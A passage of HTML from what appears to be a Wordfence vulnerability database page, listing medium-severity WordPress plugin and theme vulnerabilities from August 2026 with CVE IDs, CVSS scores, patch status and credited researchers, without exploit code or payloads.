						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73402" target="_blank" rel="noopener noreferrer">							CVE-2026-73402						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-base-booking-of-appointments-services-and-events" target="_blank" rel="noopener">WP BASE Booking of Appointments, Services and Events</a> <span class="wfvr-software-slug">[wp-base-booking-of-appointments-services-and-events]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3134259fccb2cd11ac78ae74096b9b91.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3134259fccb2cd11ac78ae74096b9b91"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/moonge" target="_blank" rel="noopener">moonge</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9536e78e-f9c9-444f-9fae-0ffa24590c5a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3061939e-cf44-41fb-a8f6-5166345df43f" target="_blank" rel="noopener">WP Tab Widget &lt;= 1.2.11 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66646" target="_blank" rel="noopener noreferrer">							CVE-2026-66646						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-tab-widget" target="_blank" rel="noopener">WP Tab Widget</a> <span class="wfvr-software-slug">[wp-tab-widget]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3061939e-cf44-41fb-a8f6-5166345df43f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a3ec7c80-2f49-4b2a-b675-7f40a7d31719" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode &lt;= 4.3.9 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73359" target="_blank" rel="noopener noreferrer">							CVE-2026-73359						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</a> <span class="wfvr-software-slug">[gdpr-cookie-consent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a3ec7c80-2f49-4b2a-b675-7f40a7d31719" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ce3c96c9-1112-4eb0-8367-b8037198b10f" target="_blank" rel="noopener">WPZOOM Forms – Drag &amp; Drop Contact Form Builder for WordPress &lt;= 2.0.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66639" target="_blank" rel="noopener noreferrer">							CVE-2026-66639						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpzoom-forms" target="_blank" rel="noopener">WPZOOM Forms – Drag &amp; Drop Contact Form Builder for WordPress</a> <span class="wfvr-software-slug">[wpzoom-forms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ce3c96c9-1112-4eb0-8367-b8037198b10f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/deb7dd3c-8c49-4323-a70a-127898550f6c" target="_blank" rel="noopener">Wufoo Shortcode &lt;= 1.55 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66643" target="_blank" rel="noopener noreferrer">							CVE-2026-66643						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wufoo-shortcode" target="_blank" rel="noopener">Wufoo Shortcode</a> <span class="wfvr-software-slug">[wufoo-shortcode]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/deb7dd3c-8c49-4323-a70a-127898550f6c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22eda61d-c802-4e9b-a68c-d5ff7d69890c" target="_blank" rel="noopener">Eventin &lt;= 4.1.20 &#8211; Insecure Direct Object Reference to Authenticated (Contributor+) Schedule Deletion and Modification</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13175" target="_blank" rel="noopener noreferrer">							CVE-2026-13175						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Event Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22eda61d-c802-4e9b-a68c-d5ff7d69890c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73d5df9f-98f7-4a47-a8e1-727cd60b29c7" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education &lt;= 3.7.41 &#8211; Authenticated (Subscriber+) Privilege Escalation</a></h4>
<div class="cvss-score-badge">6.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-68568" target="_blank" rel="noopener noreferrer">							CVE-2026-68568						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education</a> <span class="wfvr-software-slug">[masterstudy-lms-learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/73d5df9f-98f7-4a47-a8e1-727cd60b29c7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61c5253c-0c0c-4026-bf04-ea5bb2985358" target="_blank" rel="noopener">WCFM Marketplace &lt;= 3.8.0 &#8211; Insecure Direct Object Reference to Authenticated (Store vendor+) Cross-Vendor Review Deletion and Status Update</a></h4>
<div class="cvss-score-badge">5.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14196" target="_blank" rel="noopener noreferrer">							CVE-2026-14196						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wc-multivendor-marketplace" target="_blank" rel="noopener">WCFM Marketplace – Multivendor Marketplace for WooCommerce</a> <span class="wfvr-software-slug">[wc-multivendor-marketplace]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/9798121c8d6727f14fb4fec286df68ec.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="9798121c8d6727f14fb4fec286df68ec"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mustafa-ahmed" target="_blank" rel="noopener">Mustafa Ahmed</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61c5253c-0c0c-4026-bf04-ea5bb2985358" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6280f40e-2998-43d4-a78f-b393e4f36df5" target="_blank" rel="noopener">AI Agent by SiteGround &lt;= 1.2.7 &#8211; Missing Authorization to Authenticated (Contributor+) Arbitrary Media Upload via /generate-content REST Endpoint</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17153" target="_blank" rel="noopener noreferrer">							CVE-2026-17153						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sg-ai-studio" target="_blank" rel="noopener">AI Agent by SiteGround</a> <span class="wfvr-software-slug">[sg-ai-studio]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6280f40e-2998-43d4-a78f-b393e4f36df5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b28e313a-3527-468f-8e86-6e51962af950" target="_blank" rel="noopener">Altair &lt;= 5.2.2 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-53999" target="_blank" rel="noopener noreferrer">							CVE-2025-53999						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/altair" target="_blank" rel="noopener">Altair</a> <span class="wfvr-software-slug">[altair]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tran-nguyen-bao-khanh-2" target="_blank" rel="noopener">Tran Nguyen Bao Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b28e313a-3527-468f-8e86-6e51962af950" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/89bd0f8f-45c7-4b54-bc89-e1ba4f867eb9" target="_blank" rel="noopener">Appointment Hour Booking – Booking Calendar &lt;= 1.5.91 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66679" target="_blank" rel="noopener noreferrer">							CVE-2026-66679						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/appointment-hour-booking" target="_blank" rel="noopener">Appointment Hour Booking – Booking Calendar</a> <span class="wfvr-software-slug">[appointment-hour-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tiago-ventura" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a6b5fa3452b966ebfba668f89b1b6c30.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a6b5fa3452b966ebfba668f89b1b6c30"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tiago-ventura" target="_blank" rel="noopener">Tiago Ventura</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/89bd0f8f-45c7-4b54-bc89-e1ba4f867eb9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b2553b9-775a-48f4-a7fd-1b885511bfa9" target="_blank" rel="noopener">Booking calendar, Appointment Booking System &lt;= 3.2.36 &#8211; Unauthenticated Insecure Direct Object Reference</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-73395" target="_blank" rel="noopener noreferrer">							CVE-2026-73395						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-calendar" target="_blank" rel="noopener">Booking calendar, Appointment Booking System</a> <span class="wfvr-software-slug">[booking-calendar]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5b2553b9-775a-48f4-a7fd-1b885511bfa9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c12cca1e-2d6a-4946-bff7-bb71e570e9d5" target="_blank" rel="noopener">CatFolders Document Gallery &amp; PDF Library &lt; 2.0.7 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19717" target="_blank" rel="noopener noreferrer">							CVE-2026-19717						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/catfolders-document-gallery" target="_blank" rel="noopener">CatFolders Document Gallery &amp; PDF Library</a> <span class="wfvr-software-slug">[catfolders-document-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ead6eac6aef4e9f4e2d49ef7f41d9316.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ead6eac6aef4e9f4e2d49ef7f41d9316"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/shikhali-jamalzade" target="_blank" rel="noopener">Shikhali Jamalzade</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c12cca1e-2d6a-4946-bff7-bb71e570e9d5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a1f192c-de8d-47e7-8055-bb64394e9a29" target="_blank" rel="noopener">Chaplin &lt;= 2.6.8 &#8211; Missing Authorization</a></h4>
<div class="cvss-score-badge">5.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>5.3 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-74021" target="_blank" rel="noopener noreferrer">							CVE-2026-74021						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 19, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/chaplin" target="_blank" rel="noopener">Chaplin</a> <span class="wfvr-software-slug">[chaplin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truong-huu-phuc" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/truong-huu-phuc" target="_blank" rel="noopener">Trương Hữu Phúc</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3a1f192c-de8d-47e7-8055-bb64394e9a29" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
